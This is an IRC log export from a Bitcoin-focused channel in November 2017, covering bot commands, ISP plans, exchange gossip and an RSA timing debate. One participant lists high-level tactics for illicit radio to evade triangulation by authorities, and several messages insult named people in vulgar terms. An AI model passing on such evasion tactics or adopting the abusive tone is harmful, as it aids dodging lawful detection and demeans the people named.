1731615;1509494644;mircea_popescu;!#s "bitcoinmagazine.net" 1731616;1509494644;a111;4 results for "\"bitcoinmagazine.net\"", http://btcbase.org/log-search?q=%22bitcoinmagazine.net%22 1731617;1509494649;mircea_popescu;also gone-gone. 1731618;1509494707;mircea_popescu;mod6 hehe bitotter.com still on :D 1731619;1509494755;BingoBoingo;!!help 1731620;1509494755;deedbot;http://deedbot.org/help.html 1731621;1509494797;BingoBoingo;First ISP statment should be ready tonight 1731622;1509494883;mircea_popescu;!#s "btcscoop.com" 1731623;1509494883;a111;36 results for "\"btcscoop.com\"", http://btcbase.org/log-search?q=%22btcscoop.com%22 1731624;1509494887;mod6;mircea_popescu: haha, yup, should be :] 1731625;1509495288;mircea_popescu;!#s "btcshares.com" 1731626;1509495289;a111;17 results for "\"btcshares.com\"", http://btcbase.org/log-search?q=%22btcshares.com%22 1731627;1509495662;mircea_popescu;!!up felipelalli 1731628;1509495662;deedbot;felipelalli voiced for 30 minutes. 1731629;1509495762;felipelalli;!#s "benvulpes" 1731630;1509495763;a111;3 results for "\"benvulpes\"", http://btcbase.org/log-search?q=%22benvulpes%22 1731631;1509495787;felipelalli;p.benvulpes.com is unreachable to me. 1731632;1509495820;mircea_popescu;http://p.bvulpes.com/ < 1731633;1509495827;mircea_popescu;!#s "codinginmysleep" 1731634;1509495827;a111;14 results for "\"codinginmysleep\"", http://btcbase.org/log-search?q=%22codinginmysleep%22 1731635;1509496018;felipelalli;thanks mircea_popescu 1731636;1509496085;mircea_popescu;!!up maxidev 1731637;1509496086;deedbot;maxidev voiced for 30 minutes. 1731638;1509496112;mircea_popescu;meanwhile in ancient lulz, http://chedr.ca/2015/04/your-emotions-are-irrelevant-and-youve-missed-the-point/ 1731639;1509496862;mircea_popescu;!#s "devilsadvocate.biz" 1731640;1509496862;a111;41 results for "\"devilsadvocate.biz\"", http://btcbase.org/log-search?q=%22devilsadvocate.biz%22 1731641;1509496870;mircea_popescu;also ded. 1731642;1509496977;felipelalli;BingoBoingo, http://p.bvulpes.com/pastes/qckGW/?raw=true 1731643;1509497027;felipelalli;!#s "SegWit" 1731644;1509497028;a111;146 results for "\"SegWit\"", http://btcbase.org/log-search?q=%22SegWit%22 1731645;1509497093;felipelalli;mircea_popescu, I tried some IRC bouncers services and almost all is 100% shit. Do you recommend me a good service? Easy & quick to setup? Thanks. 1731646;1509497114;mircea_popescu;we're in the process of setting up a republican isp because non-republican isps are 100% shit. 1731647;1509497262;felipelalli;With a decent IRC bouncer! s2 1731648;1509497431;shinohai;Coming soon! (tm) 1731649;1509497457;felipelalli;Amazing company! 1731650;1509498093;shinohai;https://imgur.com/gallery/gKCaj 1731651;1509499112;shinohai;Run moar cloud: http://archive.is/7dNcy 1731652;1509499256;*;mircea_popescu recalls the openssh census lulz 1731653;1509503651;BingoBoingo;This has been a good run of meetings these past couple days. Yesterday the speaker was a "jackpot victim", tonight two newcomers came in one fresh outta rehab. 1731654;1509504476;mod6;Good Evening TMSR~, the State of Bitcoin Address from The Bitcoin Foundation should be out tomorrow. 1731655;1509505178;mircea_popescu;in other "closer ties", usg managed to get samsung's boss convicted for "corruption". 1731656;1509506060;mircea_popescu;aww, anjie quit umlauting too. which "distributed multiuser platform" bla bla lasted exactly as long as she kept pushing the idiots. 1731657;1509506293;BingoBoingo;Maybe everyone's waiting for TMSR ISP? 1731658;1509506671;mircea_popescu;that was 2015. 1731659;1509506782;BingoBoingo;I was still only working step 1 back then. 1731660;1509514504;BingoBoingo;!!deed http://wotpaste.cascadianhacker.com/pastes/bpnmx/?raw=true 1731661;1509514521;BingoBoingo;^ pls to let me know if retarded or sane 1731662;1509517288;deedbot;http://trilema.com/2017/il-bestione/ << Trilema - Il bestione 1731663;1509517581;ben_vulpes;doesn't seem terribly wacky, BingoBoingo 1731664;1509517602;ben_vulpes;pantsuit purge? https://www.usatoday.com/story/news/politics/onpolitics/2017/10/31/house-financial-services-chairman-jeb-hensarling-announces-he-wont-run-re-election/818337001/ 1731665;1509529910;BingoBoingo;ben_vulpes: Ty, how is your thing coming along. Ready to try splitting undersea cable cost in 2021? 1731666;1509542024;mircea_popescu;BingoBoingo why not on your blog ? 1731667;1509542044;mircea_popescu;moreover, it's impossible to read through the wordage. are you saying that you sold bitcoin at 6.05kusd ? 1731668;1509543669;mircea_popescu;http://archive.is/R55fd << check it out, peter surda is "saddened" by "the great bitcoin blocksize debate". you know, the march 2017 version of it, that is pre the fucking of bitcvoin crash and post the fucking of usgavin. somewhere in between. 1731669;1509543693;mircea_popescu;but THEN the fucktarded imbecile with thoroughly unwarranted delusions of relevancy and independence somehow magically omits to spend the intervening six months sucking the cock of the winning camp. 1731670;1509543757;mircea_popescu;because he has this option, in his dumb head, he may pick and choose. and this alternate strategy of "picking winners" in the sense of "i'll only condescend to be defeated if i like the idea, and otherwise pretend nothing happened" totally works! it's a viable alt-strategy that leads straight to personal importance and relevancy!!1 1731671;1509543763;mircea_popescu;fucktards already jesus f. christ. 1731672;1509544807;mircea_popescu;and in other great victories, ethereum-info.de 1731673;1509546713;asciilifeform;to pile on the lulz re subj, asciilifeform saw ethertardium adcrapolade on a filterless comp in ro 1731674;1509546757;asciilifeform;( what kind of sense this could have made, is question that i will leave to the pro entomologists ) 1731675;1509546826;mircea_popescu;what's a filterless comp ? 1731676;1509546857;asciilifeform;virginal vm with heathenware 1731677;1509546876;asciilifeform;piped via public wifitron 1731678;1509546910;asciilifeform;( i.e. not a 'cookiated' or otherwise specifically contaminated item ) 1731679;1509546911;mircea_popescu;the entirely of the usg-i-cant-believe-its-not-bitcoin is the orc colonized lands. there, they actually believe the shit they read in bad localized versions of the ny times. 1731680;1509546920;asciilifeform;gotta be 1731681;1509546928;mircea_popescu;sorta how the survival of the inept imperial bureaucracy was called "the church" in the orclands. 1731682;1509546961;asciilifeform;http://btcbase.org/log/2017-11-01#1731660 << i must confess that this did not make proper sense to me. is BingoBoingo's isp exists ? or 'hoped to exist' ? how operated ? none of this is clear from the linked txt 1731683;1509546961;a111;Logged on 2017-11-01 05:35 BingoBoingo: !!deed http://wotpaste.cascadianhacker.com/pastes/bpnmx/?raw=true 1731684;1509546973;mircea_popescu;rewrite needed. 1731685;1509546977;asciilifeform;verily 1731686;1509546988;mircea_popescu;also, ima jungle today, might not have the patience to cut up patch for sat dish. 1731687;1509547006;asciilifeform;it strikes me as the archetypical 'dividing the skin of an unkilled bear' , BingoBoingo 1731688;1509547056;asciilifeform;jungle << neato 1731689;1509547067;asciilifeform;give my regards to the ocelot. 1731690;1509547081;mircea_popescu;dja see teh crocs ? 1731691;1509547095;asciilifeform;i did ! but will nitpick, i indeed have stared in the mouth of a living croc 1731692;1509547114;mircea_popescu;this is no nitpick! good for you! 1731693;1509547129;asciilifeform;wasn't in genuine cocastan tho : we had a travelling exhibit, with plexiglass trailers etc, fiddybux a ticket. 1731694;1509547155;asciilifeform;i find it interesting how the apparatus of the crocodilians is mechanically put together 1731695;1509547165;asciilifeform;essentially a bear trap made of flesh and bone 1731696;1509547207;mircea_popescu;nah. crocodile, notwithstanding is hardly a reptile, more a bird/dinosaur, is actually quite intelligent. 1731697;1509547216;asciilifeform;it 'winds' for as long as 20-30sec, before it can be 'sprung'; and during this interval, theoretically a man can hold it closed and prevent the 'spring' from winding, with one hand. but asciilifeform was not permitted into the crocodilarium to verify this truism. 1731698;1509547217;mircea_popescu;has cerebral cortex even. did you know it traps birds ? 1731699;1509547240;asciilifeform;same as we trap birds ? 1731700;1509547243;mircea_popescu;at all points duct tape can keep it shut. the opening muscles are very weak indeed. the closing muscles however... 50kN, like fucking metal press. 1731701;1509547244;asciilifeform;it flies in, snaps ? 1731702;1509547247;mircea_popescu;asciilifeform nah. 1731703;1509547258;asciilifeform;it's exactly a mousetrap aha 1731704;1509547263;asciilifeform;but how birds ? 1731705;1509547274;mircea_popescu;what it does is htis : 1. it knows when bird nesting season is because 2. this means twigs are scarce so 3. constructs an arrangement of twigs on its nose 1731706;1509547288;asciilifeform;this is pretty neat. i had nfi. 1731707;1509547324;mircea_popescu;it generally understands animal behaviour. such as times to water and etc. 1731708;1509547361;asciilifeform;for a beast that cannot chew -- it gotta 1731709;1509547380;mircea_popescu;they actually have a sort of team-chew implemented. 1731710;1509547381;asciilifeform;( all he can do, is pull you into the water, and rotate himself like propeller to tear off $chunk ) 1731711;1509547480;*;asciilifeform brb, meat 1731712;1509547642;mod6;<+mircea_popescu> also, ima jungle today, might not have the patience to cut up patch for sat dish. << cool! 1731713;1509549589;mod6;http://btcbase.org/log/2017-11-01#1731672 << haha 1731714;1509549589;a111;Logged on 2017-11-01 14:00 mircea_popescu: and in other great victories, ethereum-info.de 1731715;1509550435;*;shinohai imagines satellite tmsr interwebz 1731716;1509550483;mod6;how goes shinohai! 1731717;1509550504;shinohai;heya mod6 o7 1731718;1509550522;mod6;o7 1731719;1509550779;asciilifeform;shinohai: shortwave imho far moar realistic, practical, cheap-and-angry. 1731720;1509551313;asciilifeform;( see also http://btcbase.org/log/2017-07-21#1688405 and elsewhere ) 1731721;1509551313;a111;Logged on 2017-07-21 17:26 mircea_popescu: the scheme DOES for instance require people maintain non-internet connections, and in general : multimedium links. because otherwise the night of no internet means the end of the republic as such. 1731722;1509552430;*;trinque had a ham radio license once upon a time 1731723;1509552508;asciilifeform;trinque: does 0 good re subj. you're a pirate, yarrrr, right off the bat, because crypto 1731724;1509552573;trinque;bother. I suppose I'll walk around reciting hex from a paper, turn my arrest into an art project 1731725;1509552697;asciilifeform;either that, or make use of past 100 yrs of tactic re anti-triangulation : e.g. a) radio doesn't live next to your earthly carcass, controlled remotely b) radio is not 1 emitter, but synchronized chorus ( see saddam's jammer thread) c) radio dun look like a radio, but like 'defective' appliance plausibly d ) use imagination 1731726;1509552718;asciilifeform;not to mention that it doesn't particularly need to transmit more than a few sec/day. 1731727;1509552805;asciilifeform;http://btcbase.org/log/2016-09-22#1547061 << old thread, with 1 suggested scheme. 1731728;1509552805;a111;Logged on 2016-09-22 14:31 asciilifeform: 1) every old lappy comes with a high-quality DAC fit for shortwave! the vga card. 1731729;1509552834;trinque;sure, there was a guy in highschool cruising around in a pirate radio van 1731730;1509552862;asciilifeform;wholly different item, and trivially, cheaply quashed with 1930s tech 1731731;1509552888;asciilifeform;continuously transmitting loud point source == target. 1731732;1509552903;trinque;point's less the efficacy of the approach but rather, loud point source didn't get squashed 1731733;1509552914;trinque;small, intermittent, moving one, much better 1731734;1509552919;asciilifeform;there was a fly in my house earlier and also didn't get squashed. 1731735;1509553004;asciilifeform;but if you set up a tower and start pumping 100kW into it, just about anywhere on planet, folx will show up to ask questions 1731736;1509553049;asciilifeform;and unless you have artillery salvo with which to answer these questions, adventure will be short. 1731737;1509553268;asciilifeform;asciilifeform finds it more than a little puzzling how little of past 30y of cheap cpu, has been put to use in advancing illicit radio -- where is the dc-to-daylight cryptospreadspectrum pirate ? why idjits still on fixed frequencies, like it were 1930s today ? 1731738;1509553301;asciilifeform;( it is conceivable that such a thing exists but wholly outside of asciilifeform's light cone, note. ) 1731739;1509553600;mod6;would be interesting ya 1731740;1509554192;asciilifeform;ohai mod6 , how goeth 1731741;1509556779;asciilifeform;!!unrate ascii_in_orcland 1731742;1509556794;deedbot;Get your OTP: http://p.bvulpes.com/pastes/nzDXB/?raw=true 1731743;1509556821;asciilifeform;!!v 6741FEDC8EACAFF80E5C156AE9E05ECD775BEB3D10998D32901FE6062CD03577 1731744;1509556821;deedbot;asciilifeform unrated ascii_in_orcland. 1731745;1509558842;BingoBoingo;Rewrite in works http://btcbase.org/log/2017-11-01#1731666 << No good reason. http://btcbase.org/log/2017-11-01#1731667 << No, attempting to list the advance as a debt by recreating necessary TMSR accounting out of log fragments http://btcbase.org/log/2017-11-01#1731682 << Will try not juggling network topology in forebrain when rewriting http://btcbase.org/log/2017-11-01#1731687 << There will be rug 1731746;1509558842;a111;Logged on 2017-11-01 13:13 mircea_popescu: BingoBoingo why not on your blog ? 1731747;1509558842;a111;Logged on 2017-11-01 13:14 mircea_popescu: moreover, it's impossible to read through the wordage. are you saying that you sold bitcoin at 6.05kusd ? 1731748;1509558842;a111;Logged on 2017-11-01 14:36 asciilifeform: http://btcbase.org/log/2017-11-01#1731660 << i must confess that this did not make proper sense to me. is BingoBoingo's isp exists ? or 'hoped to exist' ? how operated ? none of this is clear from the linked txt 1731749;1509558842;a111;Logged on 2017-11-01 14:36 asciilifeform: it strikes me as the archetypical 'dividing the skin of an unkilled bear' , BingoBoingo 1731750;1509559031;BingoBoingo; shinohai: shortwave imho far moar realistic, practical, cheap-and-angry. << Undersea cables for most work, run them between cool kids (China/Chile, etc), keep shortwave because pantsuit process of "What's they point they fall back to shortwave" 1731751;1509559129;BingoBoingo; not to mention that it doesn't particularly need to transmit more than a few sec/day. << Janitorial service, vacuums. Recieve at landromat. 1731752;1509559174;mod6;<+asciilifeform> ohai mod6 , how goeth << good! 1731753;1509559526;asciilifeform;!~later tell mircea_popescu http://wotpaste.cascadianhacker.com/pastes/Vv4dq/?raw=true 1731754;1509559526;jhvh1;asciilifeform: The operation succeeded. 1731755;1509559793;asciilifeform;!!up unrate rothbart 1731756;1509559794;deedbot;unrate voiced for 30 minutes. 1731757;1509559797;asciilifeform;grr 1731758;1509559805;asciilifeform;ugh, 1731759;1509559807;asciilifeform;!!unrate rothbart 1731760;1509559809;deedbot;Get your OTP: http://p.bvulpes.com/pastes/C7k1a/?raw=true 1731761;1509559815;asciilifeform;!!unrate solrodar 1731762;1509559817;deedbot;Get your OTP: http://p.bvulpes.com/pastes/fQTwO/?raw=true 1731763;1509559824;asciilifeform;!!unrate doppler 1731764;1509559826;deedbot;Get your OTP: http://p.bvulpes.com/pastes/WNoBK/?raw=true 1731765;1509559829;asciilifeform;!!unrate ccmtacks 1731766;1509559831;deedbot;Get your OTP: http://p.bvulpes.com/pastes/UHf88/?raw=true 1731767;1509559900;asciilifeform;!!v F5D1A734D8119D46C98B039E1AFF1D011EC5BBAAB472A6BBA7B7048EE0B86442 1731768;1509559900;deedbot;asciilifeform unrated rothbart. 1731769;1509559909;asciilifeform;!!v ACF5C1B6429DF3BF7BDACF6ADDA95D9787CB80D1E71F2DD3546FB5AFEDB6790F 1731770;1509559909;deedbot;asciilifeform unrated solrodar. 1731771;1509559917;asciilifeform;!!v 56BBC2A14639A2DE12462D5A518A48C8BD235F621A02B58A789EE55DC95C9329 1731772;1509559917;deedbot;asciilifeform unrated doppler. 1731773;1509559925;asciilifeform;!!v 4556DC5CA62415311E7BA2BBDF43920C5B893B6B6AD95EFFF4E498EF052DC279 1731774;1509559925;deedbot;asciilifeform unrated ccmtacks. 1731775;1509560003;deedbot;http://deedbot.org/bundle-492667.txt 1731776;1509560250;asciilifeform;http://btcbase.org/log/2017-11-01#1731750 << cables make satellite look cheap and defensible. 1731777;1509560250;a111;Logged on 2017-11-01 17:57 BingoBoingo: shinohai: shortwave imho far moar realistic, practical, cheap-and-angry. << Undersea cables for most work, run them between cool kids (China/Chile, etc), keep shortwave because pantsuit process of "What's they point they fall back to shortwave" 1731778;1509560295;asciilifeform;they are imho an intrinsically usgistic item -- costly, fragile, vulnerable, conspicuous. 1731779;1509560382;asciilifeform;they're rather like fields of wheat -- practically an invitation for mountain horsemen to come and rape. 1731780;1509561098;BingoBoingo;Well, figure they get saved for ability to say Ghandi's trademark line: "Our words are backed by nuclear weapons" 1731781;1509561117;asciilifeform;didn't save su cable in sea of japan from 'ivy bells' . 1731782;1509561158;BingoBoingo;Su was to passive about it, unlike ghandi 1731783;1509561170;asciilifeform;or for that matter the current ones from regular nsa-authored 'oopses' 1731784;1509561195;BingoBoingo;Other Sue once again, too passive 1731785;1509561243;asciilifeform;meanwhile, in the world of 'totally not stolen from #t', https://archive.is/UuRQt 1731786;1509561255;asciilifeform;'how Bitfinex themselves ran arbitrage with other exchanges, and displayed orders from other exchanges as their own, as if it was their own order book' etc. 1731787;1509561345;BingoBoingo;two cans one string! 1731788;1509561652;asciilifeform;and meanwhile in 'totally not stolen from phuctor!1!' >> https://archive.is/BjqlE . 1731789;1509562277;davout;http://btcbase.org/log/2017-11-01#1731786 <<< i don't see any fundamental problem with taking liquidity from somewhere and reselling it in your shop 1731790;1509562277;a111;Logged on 2017-11-01 18:34 asciilifeform: 'how Bitfinex themselves ran arbitrage with other exchanges, and displayed orders from other exchanges as their own, as if it was their own order book' etc. 1731791;1509563471;asciilifeform;davout: no problem with selling items that may or may not exist or have any connection whatsoever to reality ?! 1731792;1509563500;asciilifeform;and to shelve them right next to actuals. 1731793;1509565132;BingoBoingo;!~ticker --market all 1731794;1509565138;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 6570.1, vol: 11325.72041369 | Bitfinex BTCUSD last: 6571.5, vol: 53071.51771809 | Kraken BTCUSD last: 6596.0, vol: 4677.10950758 | Volume-weighted last average: 6572.92937542 1731795;1509565330;BingoBoingo;!!up doppler 1731796;1509565330;deedbot;doppler voiced for 30 minutes. 1731797;1509565375;BingoBoingo;!~bcstats 1731798;1509565377;jhvh1;BingoBoingo: Current Blocks: 492685 | Current Difficulty: 1.452839779145E12 | Next Difficulty At Block: 493919 | Next Difficulty In: 1234 blocks | Next Difficulty In About: 1 week, 1 day, 10 hours, 22 minutes, and 14 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None 1731799;1509565435;BingoBoingo;In classic Trilema http://trilema.com/2014/a-useful-list-of-things/ 1731800;1509565616;doppler;haha, the last list item is great 1731801;1509565648;BingoBoingo;And in other SOPs Sopping slop: "Chief Judge Beryl A. Howell of the U.S. District Court for the District of Columbia had agreed to allow Robert Mueller to use something called the crime-fraud exception to attorney-client privilege to compel testimony from an attorney who formerly represented Paul Manafort and Manafort’s onetime employee Rick Gates." 1731802;1509565648;asciilifeform;in other rolulz, http://www.umcugir.ro/products.html << alive an' well 1731803;1509565659;asciilifeform;but natoized . 1731804;1509567556;asciilifeform;http://www.umcugir.ro/Buget-Bilanturi%20contabile.html << public statements, interestingly. 1731805;1509567580;asciilifeform;went, apparently, into the black, when absorbed into the reich machine. 1731806;1509568254;asciilifeform;meanwhile in the world of rotaku kitsch, https://www.youtube.com/watch?v=hX9TRiFaS6c 1731807;1509568278;asciilifeform;^ asciilifeform spotted $subj playing in one of the restaurants in timis 1731808;1509568306;asciilifeform;^ approx. a ro-flavoured 'широка страна моя родная'. 1731809;1509568781;asciilifeform;BingoBoingo: rogue states are all quite alike, whether they use 'crime-fraud exception' or 'soldering iron up yer starfish exception' to 'compel testimony' 1731810;1509569026;davout;http://btcbase.org/log/2017-11-01#1731806 <<< /me actually enjoyed :D 1731811;1509569026;a111;Logged on 2017-11-01 20:30 asciilifeform: meanwhile in the world of rotaku kitsch, https://www.youtube.com/watch?v=hX9TRiFaS6c 1731812;1509569035;asciilifeform;metoo. 1731813;1509569104;davout;not understanding the lyrics might actually help i suspect 1731814;1509569118;asciilifeform;it's mebbe 1stgrade level. 1731815;1509569159;davout;your "kindergarten-level" claims don't fool anyone 1731816;1509569200;asciilifeform;i'll let the actual ro-boriginals settle this one, lol 1731817;1509569330;*;davout used to listen to stuff like https://www.youtube.com/watch?v=JrEzx-FryfE 1731818;1509569541;asciilifeform;such europistan!1!! 1731819;1509569650;davout;promised land!!1 1731820;1509569926;asciilifeform;protocol land. 1731821;1509570015;davout;another pretty cool one https://www.youtube.com/watch?v=4mKcM-Hbct8 1731822;1509570035;davout;gets actually started after a minute or so 1731823;1509570476;asciilifeform;meanwhile in timis prime realestate, http://insolventa.ro/vanzari-3/imobiliare/spatii/spatii-depozitare-hale/818-proprietate-imobiliara-buzias 1731824;1509570479;asciilifeform;^ BingoBoingo ? 1731825;1509570505;asciilifeform;i immediately thought of your desert hotel 1731826;1509576132;BingoBoingo;Oh my 1731827;1509576178;BingoBoingo;asciilifeform: Someone needs to get some practice doing stucco! 1731828;1509579620;mod6;jurov: thanks for posting the October report! 1731829;1509586281;mod6;Ladies and Gentlemen of The Most Serene Republic, The Bitcoin Foundation's: State of Bitcoin Address: http://therealbitcoin.org/ml/btc-dev/2017-November/000277.html 1731830;1509587378;shinohai;ty mod6 ! 1731831;1509587649;mod6;Most welcome. 1731832;1509587653;mod6;How goes tonight? 1731833;1509587946;shinohai;Not bad, gonna turn in earl been up since 4 am :/ 1731834;1509588049;mod6;ah, wow. ya, get some rest Sir. 1731835;1509589914;lobbes;while probably elementary to most here, I just discovered that I can send POST requests with curl. One single line! The simple joys of n00bdom. 1731836;1509589917;lobbes;anywho, that was the piece of the puzzle I needed to solve for this 'stop-gap' archive solution. I'ma start putting these pieces together. Will keep everyone posted 1731837;1509589978;trinque;great lobbes 1731838;1509589998;trinque;curl can do just about any http-ment you want, manpage is your friend 1731839;1509590077;lobbes;powerful tool, I'm finally starting to grok 1731840;1509590218;lobbes;ultimately, my plan is that lobbesbot will just store urls to-be-archived in a database. A separate process will do the submitting/downloading of zip to/from archive.is. Whenever a better www-to-zip comes along I can just switch out the later process with it 1731841;1509590222;doppler;very handy that it can handle url-encoding, etc. too 1731842;1509590432;trinque;lobbes: decoupling sounds wise to me 1731843;1509590464;trinque;archiver process breaks, can fix, restart, keep munching on work queue 1731844;1509590475;trinque;all of deedbot's connected services work in that manner 1731845;1509590645;lobbes;I've always admired the 'keep data and code as separate as possible' approach you take trinque. From what I can grok, that is 1731846;1509590659;lobbes;makes sense at least 1731847;1509590703;lobbes;has been in-line with some meat-world mentors I was blessed to have 1731848;1509590799;lobbes;anyways, for the wotpastes specifically, I plan to download and store those myself from the get-go (and NOT route them through archive.is), seeing as those are easily 'flagged' due to the predictable url. To alf's point, even if archive.is stays up, diddling is always a threat. Any bits I can do without it now is +ev imo 1731849;1509591108;mod6;<+trinque> curl can do just about any http-ment you want, manpage is your friend << aha 1731850;1509631421;asciilifeform;http://wotpaste.cascadianhacker.com/pastes/iVV9t/?raw=true << in other malwares. 1731851;1509631960;asciilifeform;in very elsewheres, http://epistema.ucoz.ru/index/0-3 << for folx who like languages. 1731852;1509632572;asciilifeform;in quite other vintage lulz, http://www.ominous-valve.com/xerf.html >> 'The United States lost this war, after Brinkley veered off into Nazi politics. He became a Hitler sympathizer, dropping the good-doctor act for a different kind of mass psychology... ...The US government had put up with goat glands, but those didn't sabotage FDR's efforts to swing pre-war, public opinion over to the Allies. This was way more serious stuff. It did 1731853;1509632572;asciilifeform; Brinkley in... the Brinkley Act, still vigorously enforced today, banning any cross-border studio-transmitter links originating in the US, including Doc's phone lines. From this point on, border blasters had do do it all from their side. A Mexican station was run off the air for this as recently as the 1990s.' 1731854;1509632665;asciilifeform;( tldr : mexico in 1940s had no radio gestapo. this was used by folx in usa to circumvent the fcc racket, until quashed by fdr decree. ) 1731855;1509635542;deedbot;http://www.dianacoman.com/2017/11/02/first-timings-of-a-basic-rsa-tron/ << Ossasepia - First Timings of a Basic RSA-tron 1731856;1509635559;*;mod6 looks 1731857;1509635568;asciilifeform;oh hey hey hey lbj ! 1731858;1509635633;asciilifeform;this is pretty neat, diana_coman 1731859;1509635767;diana_coman;:) thanks asciilifeform ; and once again a big thank you for carving out that mpi part - it helped a LOT 1731860;1509635835;diana_coman;I gotta run now for a few hours but I'll be back later if there are any obs/comments on it 1731861;1509635889;asciilifeform;1s, about to post 1731862;1509635940;asciilifeform;http://www.dianacoman.com/2017/11/02/first-timings-of-a-basic-rsa-tron/#comment-967 1731863;1509636048;asciilifeform;also 1.1s seems like a pretty long time for a 4096b modexp on traditional mpi. 1731864;1509636099;asciilifeform;plz consider posting your test harness, diana_coman 1731865;1509636148;diana_coman;hmm, I'll check again all the way; at a first look it is as stated but will look and get back on this 1731866;1509636208;diana_coman;makes sense to post the code too though it'll end up in that annoying cycle of versioning since it's far from any final state 1731867;1509636208;asciilifeform;1+ sec is moar in ffa ballpark than heathentron's 1731868;1509636219;asciilifeform;do what asciilifeform does, post barbaric paste. 1731869;1509636430;mod6;diana_coman: nice write up! 1731870;1509636498;asciilifeform;aha, quality 1731871;1509636544;asciilifeform;( though i would very much like to see how the seemingly backward decrypt/encrypt time cost diff came about ) 1731872;1509636647;asciilifeform;>> http://wotpaste.cascadianhacker.com/pastes/DrA3R/?raw=true << for n00bs : rsa-cum-crt , as seen in koch's gpg-1.4.10 1731873;1509636711;asciilifeform;i.e. you get a speedup on seekrit-op modexp ( but not on public-op modexp ) because you know p and q . 1731874;1509636792;asciilifeform;now perhaps diana_coman replaced the thing with mpi_powm( output, input, skey->d, skey->n ) or equiv. -- but then speed of encrypt and decrypt ought to be ~equal~ 1731875;1509636795;asciilifeform;so i have nfi 1731876;1509636903;asciilifeform;also the expected speedup from crt is ~4-fold, not 100-fold... 1731877;1509636936;asciilifeform;!~calc 1.1082 / 0.0112 1731878;1509636937;jhvh1;asciilifeform: 1.1082 / 0.0112 = 98.94642857142858 1731879;1509636943;asciilifeform;mightystrange. 1731880;1509642811;asciilifeform;!~ticker --market all 1731881;1509642819;jhvh1;asciilifeform: Bitstamp BTCUSD last: 6921.45, vol: 26270.26633989 | Bitfinex BTCUSD last: 6897.8, vol: 96963.3613234 | Kraken BTCUSD last: 6927.4, vol: 7339.36388112 | Volume-weighted last average: 6904.22197869 1731882;1509643248;BingoBoingo;!~ticker --market all 1731883;1509643253;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 6951.95, vol: 26297.12841144 | Bitfinex BTCUSD last: 6936.0, vol: 97023.69084883 | Kraken BTCUSD last: 6960.0, vol: 7368.49364617 | Volume-weighted last average: 6940.5625999 1731884;1509643805;*;BingoBoingo doing work on physical plant, connection may be intermittent over next day 1731885;1509643941;BingoBoingo;http://btcbase.org/log/2017-11-02#1731863 << per Elliot, math is so unfair 1731886;1509643941;a111;Logged on 2017-11-02 15:20 asciilifeform: also 1.1s seems like a pretty long time for a 4096b modexp on traditional mpi. 1731887;1509644180;asciilifeform;lol 1731888;1509644259;BingoBoingo;If math was fair, Elloit would have already had an ffa for asciilifeform 1731889;1509644408;asciilifeform;BingoBoingo: how's the brazil thing going 1731890;1509644424;asciilifeform;( or nao peru ?? ) 1731891;1509644504;BingoBoingo;asciilifeform: Still wringing number out of people 1731892;1509644626;BingoBoingo;Using the time waiting for people to people to clean up and condense physical plant here for greater portability 1731893;1509644694;BingoBoingo;How goes your Rokatu-expat quest 1731894;1509644758;diana_coman; >> http://wotpaste.cascadianhacker.com/pastes/DrA3R/?raw=true << for n00bs : rsa-cum-crt , as seen in koch's gpg-1.4.10 <- aha, that's what I use, yes; anyways, will comb the thing again a bit later today and then get back with something concrete 1731895;1509644842;asciilifeform;BingoBoingo: still snarfing up ro lang; 'read head' worx, but training 'write head' on wrong side of planet not trivial 1731896;1509644878;asciilifeform;diana_coman: does it make sense why asciilifeform went 'wtf, backward' / 1731897;1509644879;asciilifeform;? 1731898;1509644933;diana_coman;asciilifeform, yes, it does; hence my going "I have to comb this all way through again" 1731899;1509644953;diana_coman;will see if I screwed it up entirely or what 1731900;1509644986;asciilifeform;diana_coman: if you paste it i can prolly say immediately where. 1731901;1509645251;asciilifeform;oh hey look who wasn't eaten! 1731902;1509645287;diana_coman;hm, public rsa uses mpi_powm; secret rsa uses crc; still though 100 fold 1731903;1509645290;diana_coman;hmm 1731904;1509645337;BingoBoingo;asciilifeform: Have you tried talking to a few meters of audio track? 1731905;1509645343;asciilifeform;diana_coman: do you have a disk access or some other oops in there, i wunder 1731906;1509645360;asciilifeform;BingoBoingo: i dun have enough lsd to have conversation with a tape, lol 1731907;1509645360;BingoBoingo;!!up mircea_popescu 1731908;1509645360;deedbot;mircea_popescu voiced for 30 minutes. 1731909;1509645406;diana_coman;asciilifeform, this is the ugly rsa.c used fwiw http://wotpaste.cascadianhacker.com/pastes/W42GS/?raw=true 1731910;1509645407;asciilifeform;diana_coman: not only you have 100fold diff, but ~wrong direction~ 1731911;1509645425;mircea_popescu;o hai. 1731912;1509645432;BingoBoingo;o hai 1731913;1509645440;asciilifeform;ohai mircea_popescu ! 1731914;1509645453;asciilifeform;diana_coman: this looks almost virginal, the oddity is prolly in wherever you invoke it 1731915;1509645465;*;mircea_popescu proceeds to logs. 1731916;1509645472;asciilifeform;( i dun see any invocations of secret_rsa in there ) 1731917;1509645509;mircea_popescu;http://btcbase.org/log/2017-11-01#1731722 << cool. i never had a license, cuz diff era ; but had machinery. 1731918;1509645509;a111;Logged on 2017-11-01 16:07 trinque had a ham radio license once upon a time 1731919;1509645525;mircea_popescu;it was a whole subculture, you'd try and talk to people then send postcards as a sort of early deedbotting 1731920;1509645527;diana_coman;well yes, basically at rsa stage all I had to change was at generating keys aka source of random bits; the rest was just identifying the relevant parts and nothing more 1731921;1509645546;asciilifeform;mircea_popescu: this tradition still lives, with the postcards 1731922;1509645565;mircea_popescu;ah ? i'd have expected early internet victim 1731923;1509645577;asciilifeform;'hamism' is a land apart from time, nearly. 1731924;1509645580;asciilifeform;frozen in amber. 1731925;1509645600;mircea_popescu;where was that part about "frozen diff bits of original lang" 1731926;1509645612;BingoBoingo;Hamster even conveniently put call sign on RV license plate 1731927;1509645613;diana_coman;asciilifeform, this is literally the bit counting : http://wotpaste.cascadianhacker.com/pastes/7G7XM/?raw=true 1731928;1509645685;*;diana_coman idly wonders if any huge snakes swallow crocodiles 1731929;1509645708;*;asciilifeform looks 1731930;1509645718;mircea_popescu;http://btcbase.org/log/2017-11-01#1731737 << -- >> http://btcbase.org/log/2017-06-20#1672501 1731931;1509645718;a111;Logged on 2017-11-01 16:21 asciilifeform: asciilifeform finds it more than a little puzzling how little of past 30y of cheap cpu, has been put to use in advancing illicit radio -- where is the dc-to-daylight cryptospreadspectrum pirate ? why idjits still on fixed frequencies, like it were 1930s today ? 1731932;1509645718;a111;Logged on 2017-06-20 16:30 phf: scussions, but also any kind of 